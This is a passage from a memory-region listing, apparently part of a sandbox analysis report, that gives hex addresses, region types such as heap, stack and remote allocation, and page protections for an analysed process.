page read and write
|
||
1F06AA50000
|
heap
|
page read and write
|
||
1C2DB5C3000
|
trusted library allocation
|
page read and write
|
||
4F30000
|
remote allocation
|
page read and write
|
||
5F81000
|
heap
|
page read and write
|
||
7D70000
|
trusted library allocation
|
page read and write
|
||
584B5CA000
|
stack
|
page read and write
|
||
55E0000
|
heap
|
page read and write
|
||
595D000
|
heap
|
page read and write
|
||
552E000
|
stack
|
page read and write
|
||
2D8D000
|
heap
|
page read and write
|
||
1C3F5C63000
|
heap
|
page read and write
|
||
1C3F3DBC000
|
heap
|
page read and write
|
||
1F068B90000
|
heap
|
page read and write
|
||
5D3B000
|
heap
|
page read and write
|
||
6095000
|
heap
|
page read and write
|
||
7515000
|
heap
|
page execute and read and write
|
||
29F6D9E7000
|
heap
|
page read and write
|
||
29F6BAD8000
|
heap
|
page read and write
|
||
57C8000
|
heap
|
page read and write
|
||
2AA0000
|
heap
|
page read and write
|
||
73A0000
|
trusted library allocation
|
page read and write
|
||
7DF478AD0000
|
trusted library allocation
|
page execute and read and write
|
||
29F6D9B3000
|
heap
|
page read and write
|
||
1C3F6BD3000
|
heap
|
page read and write
|
||
54D0000
|
trusted library allocation
|
page read and write
|
||
1C3F3E31000
|
heap
|
page read and write
|
||
55FF000
|
trusted library allocation
|
page read and write
|
||
27EC000
|
heap
|
page read and write
|
||
3470000
|
heap
|
page read and write
|
||
1F06A9B1000
|
heap
|
page read and write
|
||
1F06A851000
|
heap
|
page read and write
|
||
1C3F5F8C000
|
heap
|
page read and write
|
||
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
5811000
|
heap
|
page read and write
|
||
1C3F6D11000
|
heap
|
page read and write
|
||
8B1E000
|
stack
|
page read and write
|
||
2730000
|
heap
|
page read and write
|
||
584BCFE000
|
stack
|
page read and write
|
||
1C3F3E3A000
|
heap
|
page read and write
|
||
5818000
|
heap
|
page read and write
|
||
7211000
|
heap
|
page read and write
|
||
1F06A954000
|
heap
|
page read and write
|
||
595D000
|
heap
|
page read and write
|
||
1C2D98A2000
|
heap
|
page read and write
|
||
1F06A984000
|
heap
|
page read and write
|
||
6ECD000
|
stack
|
page read and write
|
||
D9795FE000
|
stack
|
page read and write
|
||
9321000
|
trusted library allocation
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
72DE000
|
stack
|
page read and write
|
||
6B7A000
|
trusted library allocation
|
page read and write
|
||
29F6D9FB000
|
heap
|
page read and write
|
||
4D80000
|
trusted library allocation
|
page read and write
|
||
5BEE000
|
heap
|
page read and write
|
||
4F30000
|
heap
|
page read and write
|
||
7FFD9BA3C000
|
trusted library allocation
|
page execute and read and write
|
||
278A77B000
|
stack
|
page read and write
|
||
29F6DAD0000
|
heap
|
page read and write
|
||
A07000
|
heap
|
page read and write
|
||
5818000
|
heap
|
page read and write
|
||
4DC0000
|
heap
|
page readonly
|
||
7FFD9BB50000
|
trusted library allocation
|
page execute and read and write
|
||
ABD000
|
trusted library allocation
|
page execute and read and write
|
||
1F0689D0000
|
heap
|
page read and write
|
||
715A000
|
heap
|
page read and write
|
||
1C3F6BD3000
|
heap
|
page read and write
|
||
1C2F3990000
|
heap
|
page read and write
|
||
5CF4000
|
heap
|
page read and write
|
||
CF17EFF000
|
unkown
|
page read and write
|
||
1C2F3788000
|
heap
|
page read and write
|
||
4A5B000
|
heap
|
page read and write
|
||
75DD000
|
stack
|
page read and write
|
||
1F06A98B000
|
heap
|
page read and write
|
||
6C60000
|
heap
|
page read and write
|
||
1F068C75000
|
heap
|
page read and write
|
||
4A41000
|
heap
|
page read and write
|
||
6B80000
|
trusted library allocation
|
page read and write
|
||
1C2D9815000
|
heap
|
page read and write
|
||
7CED000
|
stack
|
page read and write
|
||
27D9000
|
heap
|
page read and write
|
||
5846000
|
heap
|
page read and write
|
||
1C3F3DF7000
|
heap
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
2D85000
|
heap
|
page read and write
|
||
1C3F5C8E000
|
heap
|
page read and write
|
||
4A5B000
|
heap
|
page read and write
|
||
7B4C000
|
heap
|
page read and write
|
||
2DAC000
|
heap
|
page read and write
|
||
AE0000
|
trusted library allocation
|
page read and write
|
||
1C3F60F5000
|
heap
|
page read and write
|
||
7D10000
|
trusted library allocation
|
page read and write
|
||
246E7760000
|
heap
|
page read and write
|
||
7B2D000
|
heap
|
page read and write
|
||
596B000
|
heap
|
page read and write
|
||
1F06A850000
|
heap
|
page read and write
|
||
1F06AC51000
|
heap
|
page read and write
|
||
1C2DB470000
|
trusted library allocation
|
page read and write
|
||
8171000
|
trusted library allocation
|
page read and write
|
||
1C3F5CA6000
|
heap
|
page read and write
|
||
4F50000
|
heap
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
9325000
|
trusted library allocation
|
page read and write
|
||
509E000
|
stack
|
page read and write
|
||
28808D41000
|
trusted library allocation
|
page read and write
|
||
6115000
|
heap
|
page read and write
|
||
79B1000
|
heap
|
page read and write
|
||
29F6BAD0000
|
heap
|
page read and write
|
||
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
1C2DB5CE000
|
trusted library allocation
|
page read and write
|
||
1C3F5FEE000
|
heap
|
page read and write
|
||
B4E000
|
stack
|
page read and write
|
||
29F6DA17000
|
heap
|
page read and write
|
||
28B0000
|
direct allocation
|
page read and write
|
||
1C2DB5BD000
|
trusted library allocation
|
page read and write
|
||
6D9D000
|
stack
|
page read and write
|
||
27E4000
|
heap
|
page read and write
|
||
7110000
|
trusted library allocation
|
page read and write
|
||
1C3F5C65000
|
heap
|
page read and write
|
||
1C3F3E31000
|
heap
|
page read and write
|
||
C59A9FE000
|
stack
|
page read and write
|
||
2D0A000
|
heap
|
page read and write
|
||
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
6B1D000
|
stack
|
page read and write
|
||
4A188FF000
|
stack
|
page read and write
|
||
6032000
|
heap
|
page read and write
|
||
4DD0000
|
heap
|
page execute and read and write
|
||
7CAE000
|
stack
|
page read and write
|
||
53CF000
|
stack
|
page read and write
|
||
4FCE000
|
stack
|
page read and write
|
||
278A27E000
|
stack
|
page read and write
|
||
29F6BAD9000
|
heap
|
page read and write
|
||
1C3F6D00000
|
heap
|
page read and write
|
||
5DD0000
|
heap
|
page read and write
|
||
55E3000
|
heap
|
page read and write
|
||
1C3F3E64000
|
heap
|
page read and write
|
||
1C3F5C8E000
|
heap
|
page read and write
|
||
56EF000
|
stack
|
page read and write
|
||
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
71CF000
|
heap
|
page read and write
|
||
2717000
|
heap
|
page read and write
|
||
5BF5000
|
heap
|
page read and write
|
||
2B00000
|
heap
|
page read and write
|
||
5903000
|
heap
|
page read and write
|
||
2785000
|
heap
|
page read and write
|
||
59C9000
|
heap
|
page read and write
|
||
29F6D9DC000
|
heap
|
page read and write
|
||
278A5FE000
|
stack
|
page read and write
|
||
27CB000
|
heap
|
page read and write
|
||
9B51000
|
trusted library allocation
|
page read and write
|
||
29F6D9E7000
|
heap
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
4A63000
|
heap
|
page read and write
|
||
1C3F3E52000
|
heap
|
page read and write
|
||
1C3F6CDA000
|
heap
|
page read and write
|
||
1C2EB4A1000
|
trusted library allocation
|
page read and write
|
||
8A4D000
|
stack
|
page read and write
|
||
555F000
|
trusted library allocation
|
page read and write
|
||
4A28000
|
heap
|
page read and write
|
||
1C2DB8F5000
|
trusted library allocation
|
page read and write
|
||
2710000
|
heap
|
page read and write
|
||
1C3F6BD3000
|
heap
|
page read and write
|
||
4A5B000
|
heap
|
page read and write
|
||
1C3F5FF0000
|
heap
|
page read and write
|
||
4D70000
|
trusted library allocation
|
page read and write
|
||
5816000
|
heap
|
page read and write
|
||
1C3F5C87000
|
heap
|
page read and write
|
||
1C3F5FF0000
|
heap
|
page read and write
|
||
1C3F5EB0000
|
remote allocation
|
page read and write
|
||
246E76A0000
|
heap
|
page read and write
|
||
28FB000
|
heap
|
page read and write
|
||
34FB000
|
heap
|
page read and write
|
||
8B21000
|
trusted library allocation
|
page read and write
|
||
27EE000
|
heap
|
page read and write
|
||
2C10000
|
heap
|
page read and write
|
||
5AD0000
|
heap
|
page read and write
|
||
5999000
|
heap
|
page read and write
|
||
812E000
|
stack
|
page read and write
|
||
4F51000
|
heap
|
page read and write
|
||
1C3F6BB4000
|
heap
|
page read and write
|
||
5827000
|
heap
|
page read and write
|
||
6093000
|
heap
|
page read and write
|
||
1C2DB611000
|
trusted library allocation
|
page read and write
|
||
5E5F000
|
stack
|
page read and write
|
||
ADA000
|
trusted library allocation
|
page execute and read and write
|
||
4A5E000
|
heap
|
page read and write
|
||
59A7000
|
heap
|
page read and write
|
||
28808326000
|
trusted library allocation
|
page read and write
|
||
1C2D97B0000
|
heap
|
page read and write
|
||
2D85000
|
heap
|
page read and write
|
||
6F5E000
|
stack
|
page read and write
|
||
2810000
|
heap
|
page read and write
|
||
771B000
|
stack
|
page read and write
|
||
1C3F3DF1000
|
heap
|
page read and write
|
||
93E000
|
stack
|
page read and write
|
||
7510000
|
heap
|
page execute and read and write
|
||
1C2DB090000
|
heap
|
page read and write
|
||
1C3F5F6E000
|
heap
|
page read and write
|
||
29F6BAD9000
|
heap
|
page read and write
|
||
4A2F000
|
heap
|
page read and write
|
||
1C3F3E31000
|
heap
|
page read and write
|
||
4F38000
|
heap
|
page read and write
|
||
1C3F5EB0000
|
remote allocation
|
page read and write
|
||
1C3F6007000
|
heap
|
page read and write
|
||
4A23000
|
heap
|
page read and write
|
||
1C3F5C70000
|
heap
|
page read and write
|
||
2D9B000
|
heap
|
page read and write
|
||
1C3F5C8A000
|
heap
|
page read and write
|
||
29F6D9D7000
|
heap
|
page read and write
|
||
7B42000
|
heap
|
page read and write
|
||
5321000
|
trusted library allocation
|
page read and write
|
||
57A8000
|
heap
|
page read and write
|
||
C59A47D000
|
stack
|
page read and write
|
||
5964000
|
heap
|
page read and write
|
||
4E0B000
|
stack
|
page read and write
|
||
1C2D9811000
|
heap
|
page read and write
|
||
4F4C000
|
heap
|
page read and write
|
||
5C68000
|
heap
|
page read and write
|
||
7FFD9B982000
|
trusted library allocation
|
page read and write
|
||
5472000
|
trusted library allocation
|
page read and write
|
||
29F6DA0B000
|
heap
|
page read and write
|
||
7AF0000
|
heap
|
page read and write
|
||
5919000
|
heap
|
page read and write
|
||
4F51000
|
heap
|
page read and write
|
||
1C3F3E14000
|
heap
|
page read and write
|
||
6081000
|
heap
|
page read and write
|
||
7EF0000
|
heap
|
page read and write
|
||
584BDFE000
|
stack
|
page read and write
|
||
4A41000
|
heap
|
page read and write
|
||
1C3F3DBC000
|
heap
|
page read and write
|
||
7AC2000
|
trusted library allocation
|
page read and write
|
||
1C2DB931000
|
trusted library allocation
|
page read and write
|
||
1C3F6BD3000
|
heap
|
page read and write
|
||
28803341000
|
trusted library allocation
|
page read and write
|
||
5818000
|
heap
|
page read and write
|
||
27E9000
|
heap
|
page read and write
|
||
2711000
|
heap
|
page read and write
|
||
AC0000
|
trusted library allocation
|
page read and write
|
||
279E000
|
heap
|
page read and write
|
||
5808000
|
heap
|
page read and write
|
||
3337000
|
heap
|
page read and write
|
||
2D5F000
|
unkown
|
page read and write
|
||
4BFB000
|
trusted library allocation
|
page read and write
|
||
4F30000
|
remote allocation
|
page read and write
|
||
1C3F6CD3000
|
heap
|
page read and write
|
||
87D0000
|
trusted library allocation
|
page read and write
|
||
5C3D000
|
heap
|
page read and write
|
||
1C3F6CED000
|
heap
|
page read and write
|
||
7DD0000
|
trusted library allocation
|
page read and write
|
||
29F6BAD0000
|
heap
|
page read and write
|
||
4F3B000
|
heap
|
page read and write
|
||
752E000
|
trusted library allocation
|
page read and write
|
||
2D46000
|
heap
|
page read and write
|
||
1C3F5FEE000
|
heap
|
page read and write
|
||
4F32000
|
heap
|
page read and write
|
||
3356000
|
heap
|
page read and write
|
||
2DA5000
|
heap
|
page read and write
|
||
1C3F5C67000
|
heap
|
page read and write
|
||
7FFD9BB62000
|
trusted library allocation
|
page read and write
|
||
6FDE000
|
stack
|
page read and write
|
||
339E000
|
stack
|
page read and write
|
||
7535000
|
trusted library allocation
|
page read and write
|
||
1C3F5C6A000
|
heap
|
page read and write
|
||
1F06A96C000
|
heap
|
page read and write
|
||
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
1C2F3777000
|
heap
|
page read and write
|
||
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
4E60000
|
trusted library allocation
|
page execute and read and write
|
||
71EA000
|
heap
|
page read and write
|
||
87B0000
|
trusted library allocation
|
page execute and read and write
|
||
2D9B000
|
heap
|
page read and write
|
||
1F06A960000
|
heap
|
page read and write
|
||
57A2000
|
heap
|
page read and write
|
||
6E8E000
|
stack
|
page read and write
|
||
5959000
|
heap
|
page read and write
|
||
2AFD000
|
stack
|
page read and write
|
||
1C3F5C7C000
|
heap
|
page read and write
|
||
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
1F06A95C000
|
heap
|
page read and write
|
||
595D000
|
heap
|
page read and write
|
||
4E1E000
|
stack
|
page read and write
|
||
60D8000
|
heap
|
page read and write
|
||
7230000
|
trusted library allocation
|
page read and write
|
||
4A5B000
|
heap
|
page read and write
|
||
29F6BAB8000
|
heap
|
page read and write
|
||
285E000
|
unkown
|
page read and write
|
||
729E000
|
stack
|
page read and write
|
||
7ACA000
|
trusted library allocation
|
page read and write
|
||
581C000
|
heap
|
page read and write
|
||
2D70000
|
heap
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
1C3F5F59000
|
heap
|
page read and write
|
||
1C3F3E2E000
|
heap
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
29F6BAB0000
|
heap
|
page read and write
|
||
279D000
|
stack
|
page read and write
|
||
1C2D9894000
|
heap
|
page read and write
|
||
29F6D8D1000
|
heap
|
page read and write
|
||
6C5A000
|
stack
|
page read and write
|
||
1F06A98B000
|
heap
|
page read and write
|
||
29F6BCF5000
|
heap
|
page read and write
|
||
5310000
|
heap
|
page read and write
|
||
7D30000
|
trusted library allocation
|
page read and write
|
||
58D0000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page execute and read and write
|
||
2D6F000
|
heap
|
page read and write
|
||
1C2DB5D1000
|
trusted library allocation
|
page read and write
|
||
4F72000
|
heap
|
page read and write
|
||
1C2F36C4000
|
heap
|
page read and write
|
||
741E000
|
stack
|
page read and write
|
||
48DE000
|
stack
|
page read and write
|
||
1C3F3E27000
|
heap
|
page read and write
|
||
52FE000
|
stack
|
page read and write
|
||
CF17BFD000
|
stack
|
page read and write
|
||
7D8F000
|
trusted library allocation
|
page read and write
|
||
1F0689F0000
|
heap
|
page read and write
|
||
58EE000
|
heap
|
page read and write
|
||
4A21000
|
heap
|
page read and write
|
||
1F06A92E000
|
heap
|
page read and write
|
||
5030000
|
heap
|
page read and write
|
||
25DE000
|
stack
|
page read and write
|
||
739F000
|
stack
|
page read and write
|
||
1C3F3D9F000
|
heap
|
page read and write
|
||
1C2F36A0000
|
heap
|
page read and write
|
||
7128000
|
heap
|
page read and write
|
||
6A0F000
|
stack
|
page read and write
|
||
2DEA000
|
heap
|
page read and write
|
||
5E60000
|
heap
|
page read and write
|
||
525E000
|
stack
|
page read and write
|
||
1C3F3D9F000
|
heap
|
page read and write
|
||
1C3F6CD3000
|
heap
|
page read and write
|
||
278A6FF000
|
stack
|
page read and write
|
||
71B2000
|
heap
|
page read and write
|
||
5987000
|
heap
|
page read and write
|
||
CD0000
|
trusted library allocation
|
page read and write
|
||
57A6000
|
heap
|
page read and write
|
||
4A24000
|
heap
|
page read and write
|
||
34B0000
|
trusted library allocation
|
page read and write
|
||
5F61000
|
heap
|
page read and write
|
||
4A3A000
|
heap
|
page read and write
|
||
1F06A952000
|
heap
|
page read and write
|
||
4A41000
|
heap
|
page read and write
|
||
279E000
|
heap
|
page read and write
|
||
8D03000
|
trusted library allocation
|
page read and write
|
||
8C9D000
|
trusted library allocation
|
page read and write
|
||
735E000
|
stack
|
page read and write
|
||
5D36000
|
heap
|
page read and write
|
||
1F06A978000
|
heap
|
page read and write
|
||
29F6DA10000
|
heap
|
page read and write
|
||
1C3F6CD3000
|
heap
|
page read and write
|
||
AB0000
|
trusted library allocation
|
page read and write
|
||
2D8B000
|
heap
|
page read and write
|
||
4A41000
|
heap
|
page read and write
|
||
6001000
|
heap
|
page read and write
|
||
C59A779000
|
stack
|
page read and write
|
||
29F6D9D2000
|
heap
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
D978D9A000
|
stack
|
page read and write
|
||
8A8E000
|
stack
|
page read and write
|
||
4A17EF5000
|
stack
|
page read and write
|
||
4A186FB000
|
stack
|
page read and write
|
||
2880B541000
|
trusted library allocation
|
page read and write
|
||
7FFD9B983000
|
trusted library allocation
|
page execute and read and write
|
||
7360000
|
trusted library allocation
|
page read and write
|
||
2D24000
|
heap
|
page read and write
|
||
1C3F6BE5000
|
heap
|
page read and write
|
||
4A63000
|
heap
|
page read and write
|
||
4F3F000
|
heap
|
page read and write
|
||
2880A141000
|
trusted library allocation
|
page read and write
|
||
1C3F600B000
|
heap
|
page read and write
|
||
5BD0000
|
heap
|
page read and write
|
||
612B000
|
heap
|
page read and write
|
||
1C3F6007000
|
heap
|
page read and write
|
||
29F6D9E4000
|
heap
|
page read and write
|
||
769D000
|
stack
|
page read and write
|
||
1C2DB100000
|
heap
|
page execute and read and write
|
||
1C3F5FF0000
|
heap
|
page read and write
|
||
4F44000
|
heap
|
page read and write
|
||
5556000
|
trusted library allocation
|
page read and write
|
||
4D63000
|
trusted library allocation
|
page execute and read and write
|
||
1C3F5F54000
|
heap
|
page read and write
|
||
7D90000
|
trusted library allocation
|
page read and write
|
||
4A18AFB000
|
stack
|
page read and write
|
||
1C3F3DF4000
|
heap
|
page read and write
|
||
B6F000
|
heap
|
page read and write
|
||
7521000
|
trusted library allocation
|
page read and write
|
||
1C3F5C60000
|
heap
|
page read and write
|
||
5987000
|
heap
|
page read and write
|
||
1F06A9BA000
|
heap
|
page read and write
|
||
4A41000
|
heap
|
page read and write
|
||
1C3F5C8E000
|
heap
|
page read and write
|
||
1C3F3F70000
|
heap
|
page read and write
|
||
7220000
|
heap
|
page execute and read and write
|
||
1C3F5FAC000
|
heap
|
page read and write
|
||
5DDA000
|
heap
|
page read and write
|
||
246E76D4000
|
heap
|
page read and write
|
||
2520000
|
heap
|
page read and write
|
||
4F51000
|
heap
|
page read and write
|
||
5919000
|
heap
|
page read and write
|
||
7390000
|
trusted library allocation
|
page read and write
|
||
27EA000
|
heap
|
page read and write
|
||
C59A87E000
|
stack
|
page read and write
|
||
C59B54B000
|
stack
|
page read and write
|
||
8C95000
|
trusted library allocation
|
page read and write
|
||
5827000
|
heap
|
page read and write
|
||
2760000
|
heap
|
page read and write
|
||
4A187FF000
|
stack
|
page read and write
|
||
55DE000
|
stack
|
page read and write
|
||
256E000
|
stack
|
page read and write
|
||
1C3F6D19000
|
heap
|
page read and write
|
||
4820000
|
heap
|
page read and write
|
||
2DAE000
|
heap
|
page read and write
|
||
1C2DBBAA000
|
trusted library allocation
|
page read and write
|
||
4A5B000
|
heap
|
page read and write
|
||
A4F000
|
stack
|
page read and write
|
||
1C3F6BD4000
|
heap
|
page read and write
|
||
4D8A000
|
trusted library allocation
|
page execute and read and write
|
||
2AEF000
|
unkown
|
page read and write
|
||
1C3F600E000
|
heap
|
page read and write
|
||
544E000
|
stack
|
page read and write
|
||
1C3F6BD3000
|
heap
|
page read and write
|
||
1C2DB541000
|
trusted library allocation
|
page read and write
|
||
1C3F5F2C000
|
heap
|
page read and write
|
||
4A24000
|
heap
|
page read and write
|
||
5030000
|
heap
|
page read and write
|
||
4A3B000
|
heap
|
page read and write
|
||
D9794FF000
|
stack
|
page read and write
|
||
1C2DB888000
|
trusted library allocation
|
page read and write
|
||
7E6E000
|
stack
|
page read and write
|
||
58EC000
|
heap
|
page read and write
|
||
80E0000
|
heap
|
page read and write
|
||
1F06A970000
|
heap
|
page read and write
|
||
246E76B0000
|
heap
|
page read and write
|
||
4A5B000
|
heap
|
page read and write
|
||
5DC3000
|
heap
|
page read and write
|
||
2DEE000
|
stack
|
page read and write
|
||
4A41000
|
heap
|
page read and write
|
||
1C3F6CDE000
|
heap
|
page read and write
|
||
29F6D9A5000
|
heap
|
page read and write
|
||
499E000
|
stack
|
page read and write
|
||
246E7930000
|
heap
|
page read and write
|
||
4F51000
|
heap
|
page read and write
|
||
29F6DAD1000
|
heap
|
page read and write
|
||
7203000
|
heap
|
page read and write
|
||
554A000
|
trusted library allocation
|
page read and write
|
||
1C2F376B000
|
heap
|
page read and write
|
||
27E6000
|
heap
|
page read and write
|
||
4A30000
|
heap
|
page read and write
|
||
6388000
|
trusted library allocation
|
page read and write
|
||
2D8B000
|
heap
|
page read and write
|
||
88C0000
|
trusted library allocation
|
page read and write
|
||
5F63000
|
heap
|
page read and write
|
||
1C2F36FF000
|
heap
|
page read and write
|
||
4F31000
|
heap
|
page read and write
|
||
1C2F3980000
|
heap
|
page read and write
|
||
5950000
|
heap
|
page read and write
|
||
1C2DB520000
|
trusted library allocation
|
page read and write
|
||
AA0000
|
trusted library allocation
|
page read and write
|
||
2AB0000
|
heap
|
page read and write
|
||
1C3F3E2B000
|
heap
|
page read and write
|
||
1C3F6D10000
|
heap
|
page read and write
|
||
1C3F3E52000
|
heap
|
page read and write
|
||
956000
|
heap
|
page read and write
|
||
7B93000
|
heap
|
page read and write
|
||
5590000
|
heap
|
page read and write
|
||
29F6DA0B000
|
heap
|
page read and write
|
||
29F6DA04000
|
heap
|
page read and write
|
||
5BE4000
|
heap
|
page read and write
|
||
47DE000
|
stack
|
page read and write
|
||
4A5C000
|
heap
|
page read and write
|
||
5BF1000
|
heap
|
page read and write
|
||
5786000
|
heap
|
page read and write
|
||
29F6D9D4000
|
heap
|
page read and write
|
||
1C2F3697000
|
heap
|
page execute and read and write
|
||
4A183FF000
|
stack
|
page read and write
|
||
1F06A967000
|
heap
|
page read and write
|
||
1C3F5C8E000
|
heap
|
page read and write
|
||
1C2DBA58000
|
trusted library allocation
|
page read and write
|
||
4A5E000
|
heap
|
page read and write
|
||
7D20000
|
trusted library allocation
|
page read and write
|
||
1C3F5C8E000
|
heap
|
page read and write
|
||
71C7000
|
heap
|
page read and write
|
||
5DCD000
|
heap
|
page read and write
|
||
584B8FF000
|
stack
|
page read and write
|
||
4F51000
|
heap
|
page read and write
|
||
2D9B000
|
heap
|
page read and write
|
||
5818000
|
heap
|
page read and write
|
||
7720000
|
heap
|
page read and write
|
||
1C3F6710000
|
trusted library allocation
|
page read and write
|
||
1C3F5F70000
|
heap
|
page read and write
|
||
2880AB41000
|
trusted library allocation
|
page read and write
|
||
4300000
|
heap
|
page read and write
|
||
7D2B000
|
trusted library allocation
|
page read and write
|
||
28808317000
|
trusted library allocation
|
page read and write
|
||
52FE000
|
stack
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
1C3F3E27000
|
heap
|
page read and write
|
||
4F0C000
|
stack
|
page read and write
|
||
5460000
|
remote allocation
|
page read and write
|
||
C59B44E000
|
stack
|
page read and write
|
||
1F06A951000
|
heap
|
page read and write
|
||
1F06C800000
|
trusted library allocation
|
page read and write
|
||
9347000
|
trusted library allocation
|
page read and write
|
||
1C3F5F5C000
|
heap
|
page read and write
|
||
7540000
|
trusted library allocation
|
page read and write
|
||
65CF000
|
stack
|
page read and write
|
||
5F5F000
|
trusted library allocation
|
page read and write
|
||
6115000
|
heap
|
page read and write
|
||
1F06A990000
|
heap
|
page read and write
|
||
29F6D9B3000
|
heap
|
page read and write
|
||
1C3F5F5A000
|
heap
|
page read and write
|
||
1C3F6B15000
|
heap
|
page read and write
|
||
59CE000
|
heap
|
page read and write
|
||
1C2D9780000
|
heap
|
page read and write
|
||
1C2EB514000
|
trusted library allocation
|
page read and write
|
||
5902000
|
heap
|
page read and write
|
||
59D1000
|
trusted library allocation
|
page read and write
|
||
1C3F3E52000
|
heap
|
page read and write
|
||
AE5000
|
trusted library allocation
|
page execute and read and write
|
||
5797000
|
heap
|
page read and write
|
||
27DE000
|
heap
|
page read and write
|
||
B50000
|
heap
|
page read and write
|
||
7B12000
|
heap
|
page read and write
|
||
4D79000
|
trusted library allocation
|
page read and write
|
||
2763000
|
heap
|
page read and write
|
||
4F4A000
|
heap
|
page read and write
|
||
2789D5E000
|
unkown
|
page read and write
|
||
1C3F5FBA000
|
heap
|
page read and write
|
||
1C3F3E32000
|
heap
|
page read and write
|
||
29F6BC34000
|
heap
|
page read and write
|
||
1C3F6D1C000
|
heap
|
page read and write
|
||
5808000
|
heap
|
page read and write
|
||
29F6D9D6000
|
heap
|
page read and write
|
||
5DD8000
|
heap
|
page read and write
|
||
1F06A97B000
|
heap
|
page read and write
|
||
7D80000
|
trusted library allocation
|
page read and write
|
||
7CF0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
5050000
|
heap
|
page read and write
|
||
5BD4000
|
heap
|
page read and write
|
||
5845000
|
heap
|
page read and write
|
||
2DA9000
|
heap
|
page read and write
|
||
29F6D9FB000
|
heap
|
page read and write
|
||
5987000
|
heap
|
page read and write
|
||
1C3F5C90000
|
heap
|
page read and write
|
||
1C3F64D0000
|
heap
|
page read and write
|
||
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
7201000
|
heap
|
page read and write
|
||
1C3F6D1C000
|
heap
|
page read and write
|
||
2CF0000
|
heap
|
page read and write
|
||
1C3F6D29000
|
heap
|
page read and write
|
||
7D40000
|
trusted library allocation
|
page read and write
|
||
3330000
|
heap
|
page read and write
|
||
1F06A950000
|
heap
|
page read and write
|
||
1C3F5C8E000
|
heap
|
page read and write
|
||
790F000
|
stack
|
page read and write
|
||
7410000
|
trusted library allocation
|
page read and write
|
||
1C3F5C76000
|
heap
|
page read and write
|
||
5919000
|
heap
|
page read and write
|
||
4F4A000
|
heap
|
page read and write
|
||
1C2DB5C0000
|
trusted library allocation
|
page read and write
|
||
5C73000
|
heap
|
page read and write
|
||
1C3F3E64000
|
heap
|
page read and write
|
||
6321000
|
trusted library allocation
|
page read and write
|
||
1C3F5C8E000
|
heap
|
page read and write
|
||
4F51000
|
heap
|
page read and write
|
||
7FFD9BA66000
|
trusted library allocation
|
page execute and read and write
|
||
4A17FFE000
|
stack
|
page read and write
|
||
1C3F3E13000
|
heap
|
page read and write
|
||
2880833E000
|
trusted library allocation
|
page read and write
|
||
584E000
|
heap
|
page read and write
|
||
5780000
|
heap
|
page read and write
|
||
2761000
|
heap
|
page read and write
|
||
5845000
|
heap
|
page read and write
|
||
521C000
|
stack
|
page read and write
|
||
4A41000
|
heap
|
page read and write
|
||
24F8000
|
stack
|
page read and write
|
||
1C3F5C64000
|
heap
|
page read and write
|
||
2DA8000
|
heap
|
page read and write
|
||
278A17D000
|
stack
|
page read and write
|
||
4E70000
|
heap
|
page read and write
|
||
5F81000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
5BDD000
|
heap
|
page read and write
|
||
7370000
|
trusted library allocation
|
page read and write
|
||
2CFC000
|
heap
|
page read and write
|
||
29F6D9B9000
|
heap
|
page read and write
|
||
9323000
|
trusted library allocation
|
page read and write
|
||
1C2DB0D0000
|
trusted library allocation
|
page read and write
|
||
4E2E000
|
stack
|
page read and write
|
||
5C73000
|
heap
|
page read and write
|
||
29F6BAFC000
|
heap
|
page read and write
|
||
1C3F5C79000
|
heap
|
page read and write
|
||
5CCB000
|
heap
|
page read and write
|
||
1C2F3690000
|
heap
|
page execute and read and write
|
||
5955000
|
heap
|
page read and write
|
||
2C5E000
|
unkown
|
page read and write
|
||
7B3E000
|
heap
|
page read and write
|
||
643B000
|
stack
|
page read and write
|
||
1C2D97C0000
|
heap
|
page read and write
|
||
3560000
|
heap
|
page read and write
|
||
2738000
|
heap
|
page read and write
|
||
5DB7000
|
heap
|
page read and write
|
||
608C000
|
heap
|
page read and write
|
||
1C3F5F54000
|
heap
|
page read and write
|
||
7B08000
|
heap
|
page read and write
|
||
5DCD000
|
heap
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
4C70000
|
heap
|
page read and write
|
||
1F0689F8000
|
heap
|
page read and write
|
||
29F6DCD0000
|
heap
|
page read and write
|
||
29F6D9EC000
|
heap
|
page read and write
|
||
580C000
|
heap
|
page read and write
|
||
1C2F3890000
|
heap
|
page read and write
|
||
4A185FE000
|
stack
|
page read and write
|
||
4F6E000
|
heap
|
page read and write
|
||
5460000
|
remote allocation
|
page read and write
|
||
2C8E000
|
stack
|
page read and write
|
||
1F06A99D000
|
heap
|
page read and write
|
||
C59A2FE000
|
stack
|
page read and write
|
||
26F0000
|
heap
|
page read and write
|
||
1C2DB50E000
|
trusted library allocation
|
page read and write
|
||
1C3F6D1E000
|
heap
|
page read and write
|
||
940000
|
heap
|
page read and write
|
||
6D96000
|
trusted library allocation
|
page read and write
|
||
1F06A9A9000
|
heap
|
page read and write
|
||
4A5E000
|
heap
|
page read and write
|
||
99F000
|
stack
|
page read and write
|
||
4F30000
|
remote allocation
|
page read and write
|
||
7FFD9B98D000
|
trusted library allocation
|
page execute and read and write
|
||
4F34000
|
heap
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
4F51000
|
heap
|
page read and write
|
||
1F06A98B000
|
heap
|
page read and write
|
||
1F068A0C000
|
heap
|
page read and write
|
||
33DF000
|
